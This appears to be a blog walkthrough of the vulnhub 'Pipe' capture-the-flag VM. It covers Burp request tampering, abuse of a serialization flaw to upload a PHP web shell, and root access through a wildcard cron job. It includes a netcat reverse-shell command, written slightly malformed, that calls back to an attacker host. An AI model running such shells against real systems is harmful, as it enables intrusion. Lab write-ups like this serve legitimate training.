Hack the Pipe VM (CTF Challenge)

Hello friends today we are going to solve another CTF challenge “PIPE” of the vulnhub labs design by Mr. Sagi. The level of this challenge is not so tough and its difficulty level is labelled as medium. Solving this lab will give you a good experience of penetration testing.

You can download it from here: https://www.vulnhub.com/entry/devrandom-pipe,124/

  • Penetrating Methodologies:
  • Network Scanning (Nmap,Netdiscover)
  • Abusing HTTP service (Burp Suite)
  • Exploiting js serialization for remote code execution
  • Insert netcat reverse_shell payload
  • Spawn TTY shell
  • Wildcard privilege escalation
  • capture the flag

Let’s Begin!!

Start with netdiscover command to identify target IP in the local network, in my network 192.168.1.104 is my target IP, you will get yours.

Further let’s enumerate open ports and protocols information of the target’s network with help of nmap following command:

And from here we get open ports 22, 80, 111, 54073

Now we will open target IP in browser as port 80 is active. Here the website reflects off unauthorized message with a login page. On login window it written “the site says: index.php” which we will be using later on.

Now using burpsuite we are going to capture the cookies for login page by setting manual proxy of Firefox browser. It has intercepted data for login page. Here we will change HTTP-GET method into HTTP-POST.

As shown in the below image replace GET from POST/index.php and then forward the intercepted request.

Ok! To above step leads us to website which shows a PIPE picture and a link below it to get Show artist info.

As we cannot see anything else on this web page so we opened the page source code. It shows an accessible directory scriptz/php.js in its script content.

Now open target IP with /scriptz in browser, and you will notice some file or scripts are present here. Download both files for further enumeration.

So first we open php.js file here we found it is serializing some data and after that we open log.php.bak which works with the js file for serialization.

Then I search in Google and found Deserialization vulnerabilities in JS 

Now again returning to our original web page, and click on the link given below of the Pipe image and capture cookies that request in burp.

Select the parameter and send it for decoding in smart decoder, in the image below red highlighted text is decoded and result is shown in below window the code which is given in bottom window need to be altered so that we can upload our malicious code.

Now modify the parm with the following code for remote code execution and then forward the request.

Check your shell.php file is uploaded in that accessible directory.

Now we have uploaded shell it’s time to open it see what it gives us. As we have executed the code for cmd, we will type cmd in URL as well.

cmd=id

It will dump the id of current user i.e. www-data.

Now let’s try to spwan tty shell of the victim’s machine with help of netcat payload: nc 10.0.0.1 1234 -e /bin/bash 192.168.1.107 1234

Then start netcat listener and then execute the payload to spawn tty shell of victim’s machine.

As you can observe we have successfully compromised target machine and run the following command for gaining root access.

Then we check for any cronjobs running on the system via cat command we can see a couple of cron jobs running which interest us. In /etc/crontab the script /usr/bin/compress.sh which is world readable now follow the below steps

Yuppie!! We got the root access.

At last open the flag.txt file and we have our flag.

Mission accomplished!

AuthorYugam Yadav is a passionate Researcher and Technical Writer at Hacking Articles. he is a hacking enthusiast. Contact Here

Leave a Reply

Your email address will not be published. Required fields are marked *